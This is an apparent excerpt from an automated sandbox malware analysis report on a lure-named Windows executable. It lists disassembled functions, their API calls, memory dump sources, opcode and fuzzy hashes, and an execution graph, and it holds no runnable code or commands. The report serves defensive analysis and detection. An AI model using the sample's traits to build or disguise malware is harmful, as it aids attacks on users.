                                        • CharNextW.USER32(?,*?|<>/":,00000000,00000000,75573420,007B5800,007B3000,0040347D,007B5800,007B5800,004036EC,?,?,?,?), ref: 00406700
                                        • CharNextW.USER32(?,?,?,00000000,?,?,?,?), ref: 0040670F
                                        • CharNextW.USER32(?,00000000,75573420,007B5800,007B3000,0040347D,007B5800,007B5800,004036EC,?,?,?,?), ref: 00406714
                                        • CharPrevW.USER32(?,?,75573420,007B5800,007B3000,0040347D,007B5800,007B5800,004036EC,?,?,?,?), ref: 00406727
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3879383872.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000003.00000002.3879368188.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3879403378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3879455624.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3879598230.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3879598230.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Char$Next$Prev
                                        • String ID: *?|<>/":
                                        • API String ID: 589700163-165019052
                                        • Opcode ID: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
                                        • Instruction ID: 12c80e2bf748d1a62cb3884e1ae38c2d534281e125f75e63bd15dfe73c9398b2
                                        • Opcode Fuzzy Hash: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
                                        • Instruction Fuzzy Hash: E711EB15800A1255DB303B148C84A7763F8EF947A4F56443FED86732C0E77D4C9286BD
                                        Function 344B4B39 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,344B4AEA,?,?,344B4A8A,?,344C2238,?,344B4BBD,00000000,00000000), ref: 344B4B59
                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 344B4B6C
                                        • FreeLibrary.KERNEL32(00000000,?,?,?,344B4AEA,?,?,344B4A8A,?,344C2238,?,344B4BBD,00000000,00000000,?,344B2082), ref: 344B4B8F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AddressFreeHandleLibraryModuleProc
                                        • String ID: CorExitProcess$mscoree.dll
                                        • API String ID: 4061214504-1276376045
                                        • Opcode ID: ba489ef6f472eda00892128b86b92c5ed45a548e597b201e459779c0f6bcc6cb
                                        • Instruction ID: 7d5febd2b047da5c72610d86c84238e786e2b684fa23cb660e29c7b84265912b
                                        • Opcode Fuzzy Hash: ba489ef6f472eda00892128b86b92c5ed45a548e597b201e459779c0f6bcc6cb
                                        • Instruction Fuzzy Hash: 91F04FB5904108BFEF119F90DC08F9DBFB9EF04365F4041B8E985A6250DB319942CAA4
                                        Function 344B15DA Relevance: 7.6, APIs: 5, Instructions: 84stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _strlen.LIBCMT ref: 344B1607
                                        • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,344B190E,?,?,00000000,?,00000000), ref: 344B1643
                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,344B190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 344B165A
                                        • lstrlenW.KERNEL32(?,?,?,?,?,344B190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 344B1661
                                        • lstrcatW.KERNEL32(00001008,?,?,?,?,?,344B190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 344B1686
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: lstrcatlstrlen$_strlen
                                        • String ID:
                                        • API String ID: 3802368996-0
                                        • Opcode ID: a1567807825ae95c29b14bfdef0aad0044982d200926203455d86ab8918dbb8c
                                        • Instruction ID: a99e09d7f26665e5f505bb9a711a2e74e73f9a6bbfbcca7569047034e651dc87
                                        • Opcode Fuzzy Hash: a1567807825ae95c29b14bfdef0aad0044982d200926203455d86ab8918dbb8c
                                        • Instruction Fuzzy Hash: CE21B676900204ABEF05DB64EC85EEE77B8EF88714F14447EE584AB141DB34A94287B9
                                        Function 344B7153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetEnvironmentStringsW.KERNEL32 ref: 344B715C
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 344B717F
                                          • Part of subcall function 344B56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 344B5702
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 344B71A5
                                        • _free.LIBCMT ref: 344B71B8
                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 344B71C7
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                        • String ID:
                                        • API String ID: 336800556-0
                                        • Opcode ID: 559945f9acbcc80aef46ebadd3bd48cedd77fda6c8bfcedffd1c16356bdbd768
                                        • Instruction ID: f1bc12e5698bceb3acdbb1e213a68a2c2e97d58e34222d647f17ec0dd155e0bb
                                        • Opcode Fuzzy Hash: 559945f9acbcc80aef46ebadd3bd48cedd77fda6c8bfcedffd1c16356bdbd768
                                        • Instruction Fuzzy Hash: BF01DFBAA01615BF3F114ABA5D88C7B7E6DDEC2AA6314017DBDC4DB300EE608C0281B4
                                        Function 344B5B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(00000000,?,00000000,344B636D,344B5713,00000000,?,344B2249,?,?,344B1D66,00000000,?,?,00000000), ref: 344B5B7F
                                        • _free.LIBCMT ref: 344B5BB4
                                        • _free.LIBCMT ref: 344B5BDB
                                        • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 344B5BE8
                                        • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 344B5BF1
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_free
                                        • String ID:
                                        • API String ID: 3170660625-0
                                        • Opcode ID: ed5441103a281c080745cf537594055cee8bf09432f1c61a024eacdcc58bd115
                                        • Instruction ID: 98c69ddcee1b69a7f0d05f50640e3ae9a6f50f378ac6a07497cb1ecf3f7f6e3f
                                        • Opcode Fuzzy Hash: ed5441103a281c080745cf537594055cee8bf09432f1c61a024eacdcc58bd115
                                        • Instruction Fuzzy Hash: D101F4BA208B01FFBF82A6346C84E1BAA2DDFC55BC714007CF8D5A6242EE74C8034538
                                        Function 344B1E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrlenW.KERNEL32(?,?,?,?,?,344B10DF,?,?,?,00000000), ref: 344B1E9A
                                        • lstrcatW.KERNEL32(?,?,?,344B10DF,?,?,?,00000000), ref: 344B1EAC
                                        • lstrlenW.KERNEL32(?,?,344B10DF,?,?,?,00000000), ref: 344B1EB3
                                        • lstrlenW.KERNEL32(?,?,344B10DF,?,?,?,00000000), ref: 344B1EC8
                                        • lstrcatW.KERNEL32(?,344B10DF,?,344B10DF,?,?,?,00000000), ref: 344B1ED3
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: lstrlen$lstrcat
                                        • String ID:
                                        • API String ID: 493641738-0
                                        • Opcode ID: 55d29587d23ea61db0544496b7632922afb6c23bf9053fbabf31dca3c38b6be2
                                        • Instruction ID: 184fcbf17b01f821d9e8de617ffabd749fbd706ddf0b4ba796cc7bd5f0174e72
                                        • Opcode Fuzzy Hash: 55d29587d23ea61db0544496b7632922afb6c23bf9053fbabf31dca3c38b6be2
                                        • Instruction Fuzzy Hash: 80F08966100514BBFB216729AC85E7F777CEFC5B64F44003DF588931909B54584392B9
                                        Function 344B91B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 344B91D0
                                          • Part of subcall function 344B571E: HeapFree.KERNEL32(00000000,00000000,?,344B924F,?,00000000,?,00000000,?,344B9276,?,?,?,?,344B7E5A,?), ref: 344B5734
                                          • Part of subcall function 344B571E: GetLastError.KERNEL32(?,?,344B924F,?,00000000,?,00000000,?,344B9276,?,?,?,?,344B7E5A,?,?), ref: 344B5746
                                        • _free.LIBCMT ref: 344B91E2
                                        • _free.LIBCMT ref: 344B91F4
                                        • _free.LIBCMT ref: 344B9206
                                        • _free.LIBCMT ref: 344B9218
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 32067ae8124b5d0d02e6bf893b65c1a25fff5e93ee5ff5f5da6515dd6416dbd7
                                        • Instruction ID: c57ab8a44dd6b9dbb7fc869c3a543667cae41553ea3f21a85a797645bb11b3c6
                                        • Opcode Fuzzy Hash: 32067ae8124b5d0d02e6bf893b65c1a25fff5e93ee5ff5f5da6515dd6416dbd7
                                        • Instruction Fuzzy Hash: 24F062B1655240EBAE54EB94D5C4C06BBD9EE043157944C3DF8C9E7601DB30FC908E78
                                        Function 344B5351 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 344B536F
                                          • Part of subcall function 344B571E: HeapFree.KERNEL32(00000000,00000000,?,344B924F,?,00000000,?,00000000,?,344B9276,?,?,?,?,344B7E5A,?), ref: 344B5734
                                          • Part of subcall function 344B571E: GetLastError.KERNEL32(?,?,344B924F,?,00000000,?,00000000,?,344B9276,?,?,?,?,344B7E5A,?,?), ref: 344B5746
                                        • _free.LIBCMT ref: 344B5381
                                        • _free.LIBCMT ref: 344B5394
                                        • _free.LIBCMT ref: 344B53A5
                                        • _free.LIBCMT ref: 344B53B6
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: d489d7786040d695e9bfa797ad12d3b5c413af2647f57827451bf5b80dee5f56
                                        • Instruction ID: 9d69c3c3311ea427a9b42e1f9419c7d1a0d9ab8674734b258d7b1360ded4b04b
                                        • Opcode Fuzzy Hash: d489d7786040d695e9bfa797ad12d3b5c413af2647f57827451bf5b80dee5f56
                                        • Instruction Fuzzy Hash: A7F01DB4924220FBFE81EB24D5C04487BA1EF0A62874D053AE8D1A3351EB354C138A9D
                                        Function 344B4BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\orders_PI 008-01.exe,00000104), ref: 344B4C1D
                                        • _free.LIBCMT ref: 344B4CE8
                                        • _free.LIBCMT ref: 344B4CF2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _free$FileModuleName
                                        • String ID: C:\Users\user\Desktop\orders_PI 008-01.exe
                                        • API String ID: 2506810119-4113895157
                                        • Opcode ID: 07760da488defcaff7a5db5a9c5914211d78b170f286ea315726776c33eec739
                                        • Instruction ID: d63a30dcae7fd273c891ecbf294dbe4a5bdc132a4fe6af50d0a28a6c16eca523
                                        • Opcode Fuzzy Hash: 07760da488defcaff7a5db5a9c5914211d78b170f286ea315726776c33eec739
                                        • Instruction Fuzzy Hash: D3314F75A00318FFEF12DB99D98099EBBBCEF85710B11417AE8C4A7311D6708A42CB75
                                        Function 344B86E4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,344B6FFD,00000000,?,00000020,00000100,?,5EFC4D8B,00000000), ref: 344B8731
                                        • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?), ref: 344B87BA
                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 344B87CC
                                        • __freea.LIBCMT ref: 344B87D5
                                          • Part of subcall function 344B56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 344B5702
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                        • String ID:
                                        • API String ID: 2652629310-0
                                        • Opcode ID: 626b0f8f5719df3a6916e9bc56cf15ade5532fa5a19765b748b218346a57728b
                                        • Instruction ID: 114c1383c69a134b9179bc55017c640dfa3237b08250c7c2548992907044a4ff
                                        • Opcode Fuzzy Hash: 626b0f8f5719df3a6916e9bc56cf15ade5532fa5a19765b748b218346a57728b
                                        • Instruction Fuzzy Hash: 62319CB6A0021AAFEF15CF65CC84EAF7BA5EB44358F10017DEC84DA290E735D951DBA0
                                        Function 344B5CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,344B1D66,00000000,00000000,?,344B5C88,344B1D66,00000000,00000000,00000000,?,344B5E85,?,FlsSetValue), ref: 344B5D13
                                        • GetLastError.KERNEL32(?,344B5C88,344B1D66,00000000,00000000,00000000,?,344B5E85,?,FlsSetValue,344BE190,FlsSetValue,00000000,00000364,?,344B5BC8), ref: 344B5D1F
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,344B5C88,344B1D66,00000000,00000000,00000000,?,344B5E85,?,FlsSetValue,344BE190,FlsSetValue,00000000), ref: 344B5D2D
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: LibraryLoad$ErrorLast
                                        • String ID:
                                        • API String ID: 3177248105-0
                                        • Opcode ID: 77cd19a87fa46fdf420a9ceafee39e3fb4a8020d80786014508e9f6954436322
                                        • Instruction ID: b2dac1e9983055d5bb9842874daf89541b98bd3efdcf77cb1dcd3546449fa019
                                        • Opcode Fuzzy Hash: 77cd19a87fa46fdf420a9ceafee39e3fb4a8020d80786014508e9f6954436322
                                        • Instruction Fuzzy Hash: 4C018876715722ABEF518A68AC48A46B79CEF057E9B104734F9C5E7240D730D803CAF4
                                        Function 344B63F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 344B655C
                                          • Part of subcall function 344B62BC: IsProcessorFeaturePresent.KERNEL32(?,344B62AB,00000000,?,?,?,?,?,?,?,344B62B8,00000000,00000000,00000000,00000000,00000000), ref: 344B62BE
                                          • Part of subcall function 344B62BC: GetCurrentProcess.KERNEL32(C0000417), ref: 344B62E0
                                          • Part of subcall function 344B62BC: TerminateProcess.KERNEL32(00000000), ref: 344B62E7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                        • String ID: *?$.
                                        • API String ID: 2667617558-3972193922
                                        • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                        • Instruction ID: c9656b252f224bbaedb0a0d0dbadc9b28e8f21e72ec75ccc49c59fce65c63d7b
                                        • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                        • Instruction Fuzzy Hash: 4651B175E00209EFEF04CFA8C881AADBBB5EF58354F24817DD8D4E7310E6359A018B61
                                        Function 344B16AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _strlen
                                        • String ID: : $Se.
                                        • API String ID: 4218353326-4089948878
                                        • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                        • Instruction ID: b0493138b910081d0b0b410e6e1faab4cbf8a7d7a866953bab99c16e9317b66f
                                        • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                        • Instruction Fuzzy Hash: 9B11E775900248AEDF10CFA8D840BDDFBFCAF09204F10406AE5C5E7252E6705B02C775
                                        Function 344B1EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                        Download Yara Rule
                                        APIs
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 344B2903
                                          • Part of subcall function 344B35D2: RaiseException.KERNEL32(?,?,?,344B2925,00000000,00000000,00000000,?,?,?,?,?,344B2925,?,344C21B8), ref: 344B3632
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 344B2920
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Exception@8Throw$ExceptionRaise
                                        • String ID: Unknown exception
                                        • API String ID: 3476068407-410509341
                                        • Opcode ID: 5b49f7822721f4015f60666693926154921ddeecd37f5eebdf2f2846befd5207
                                        • Instruction ID: 0add77be5b8f98c0e8ea98d6af8dd6ba3275969d79a2a801cdc503bb2a3d59d6
                                        • Opcode Fuzzy Hash: 5b49f7822721f4015f60666693926154921ddeecd37f5eebdf2f2846befd5207
                                        • Instruction Fuzzy Hash: 0DF0CD78A0070DBB9F04A6A5EC4C95E776C7F00650B904679E9D4D2191FF71EA16C5F0
                                        Function 00405F13 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00405F31
                                        • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,007B3000,004034A0,007B5000,007B5800,007B5800,007B5800,007B5800,007B5800,007B5800,004036EC), ref: 00405F4C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3879383872.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000003.00000002.3879368188.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3879403378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3879455624.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3879598230.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3879598230.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: CountFileNameTempTick
                                        • String ID: nsa
                                        • API String ID: 1716503409-2209301699
                                        • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                        • Instruction ID: 2ec416300cd5d099b763d3688cd3c506487cb406e2025687db32897a35dea38d
                                        • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                        • Instruction Fuzzy Hash: 84F09676B00204BBDB008F55ED05E9FB7ACEB95750F10803AEA04F7140E6B499548B58
                                        Function 344B69F3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetOEMCP.KERNEL32(00000000,?,?,344B6C7C,?), ref: 344B6A1E
                                        • GetACP.KERNEL32(00000000,?,?,344B6C7C,?), ref: 344B6A35
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: |lK4
                                        • API String ID: 0-1935249415
                                        • Opcode ID: efdc6fccb99fa6530a1b5268ab78a00e0fe5b933f951e8bf0e1ec73f2a1dbddd
                                        • Instruction ID: 508657d75f60154e4dbde578709139b56e90a4d3c0c0f505a5437f33070ce9d1
                                        • Opcode Fuzzy Hash: efdc6fccb99fa6530a1b5268ab78a00e0fe5b933f951e8bf0e1ec73f2a1dbddd
                                        • Instruction Fuzzy Hash: 6AF08C705002089BFF10CB68C4887AC7774FF06339F144778E4E89A2E1EB7188578B66

                                        Execution Graph

                                        Execution Coverage:6.5%
                                        Dynamic/Decrypted Code Coverage:9.2%
                                        Signature Coverage:3.2%
                                        Total number of Nodes:2000
                                        Total number of Limit Nodes:91
                                        execution_graph 37629 44dea5 37630 44deb5 FreeLibrary 37629->37630 37631 44dec3 37629->37631 37630->37631 37632 4287c1 37633 4287d2 37632->37633 37636 429ac1 37632->37636 37637 428818 37633->37637 37638 42881f 37633->37638 37647 425711 37633->37647 37634 4259da 37695 416760 11 API calls 37634->37695 37666 425ad6 37636->37666 37702 415c56 11 API calls 37636->37702 37669 42013a 37637->37669 37697 420244 97 API calls 37638->37697 37639 4260dd 37696 424251 120 API calls 37639->37696 37643 4259c2 37643->37666 37689 415c56 11 API calls 37643->37689 37647->37634 37647->37636 37647->37643 37650 429a4d 37647->37650 37653 422aeb memset memcpy memcpy 37647->37653 37657 4260a1 37647->37657 37665 425a38 37647->37665 37685 4227f0 memset memcpy 37647->37685 37686 422b84 15 API calls 37647->37686 37687 422b5d memset memcpy memcpy 37647->37687 37688 422640 13 API calls 37647->37688 37690 4241fc 11 API calls 37647->37690 37691 42413a 90 API calls 37647->37691 37651 429a66 37650->37651 37652 429a9b 37650->37652 37698 415c56 11 API calls 37651->37698 37656 429a96 37652->37656 37700 416760 11 API calls 37652->37700 37653->37647 37701 424251 120 API calls 37656->37701 37694 415c56 11 API calls 37657->37694 37659 429a7a 37699 416760 11 API calls 37659->37699 37665->37643 37692 422640 13 API calls 37665->37692 37693 4226e0 12 API calls 37665->37693 37670 42014c 37669->37670 37673 420151 37669->37673 37712 41e466 97 API calls 37670->37712 37672 420162 37672->37647 37673->37672 37674 4201b3 37673->37674 37675 420229 37673->37675 37676 4201b8 37674->37676 37677 4201dc 37674->37677 37675->37672 37678 41fd5e 86 API calls 37675->37678 37703 41fbdb 37676->37703 37677->37672 37681 4201ff 37677->37681 37709 41fc4c 37677->37709 37678->37672 37681->37672 37684 42013a 97 API calls 37681->37684 37684->37672 37685->37647 37686->37647 37687->37647 37688->37647 37689->37634 37690->37647 37691->37647 37692->37665 37693->37665 37694->37634 37695->37639 37696->37666 37697->37647 37698->37659 37699->37656 37700->37656 37701->37636 37702->37634 37704 41fbf8 37703->37704 37707 41fbf1 37703->37707 37717 41ee26 37704->37717 37708 41fc39 37707->37708 37727 4446ce 11 API calls 37707->37727 37708->37672 37713 41fd5e 37708->37713 37710 41ee6b 86 API calls 37709->37710 37711 41fc5d 37710->37711 37711->37677 37712->37673 37715 41fd65 37713->37715 37714 41fdab 37714->37672 37715->37714 37716 41fbdb 86 API calls 37715->37716 37716->37715 37718 41ee41 37717->37718 37719 41ee32 37717->37719 37728 41edad 37718->37728 37731 4446ce 11 API calls 37719->37731 37722 41ee3c 37722->37707 37725 41ee58 37725->37722 37733 41ee6b 37725->37733 37727->37708 37737 41be52 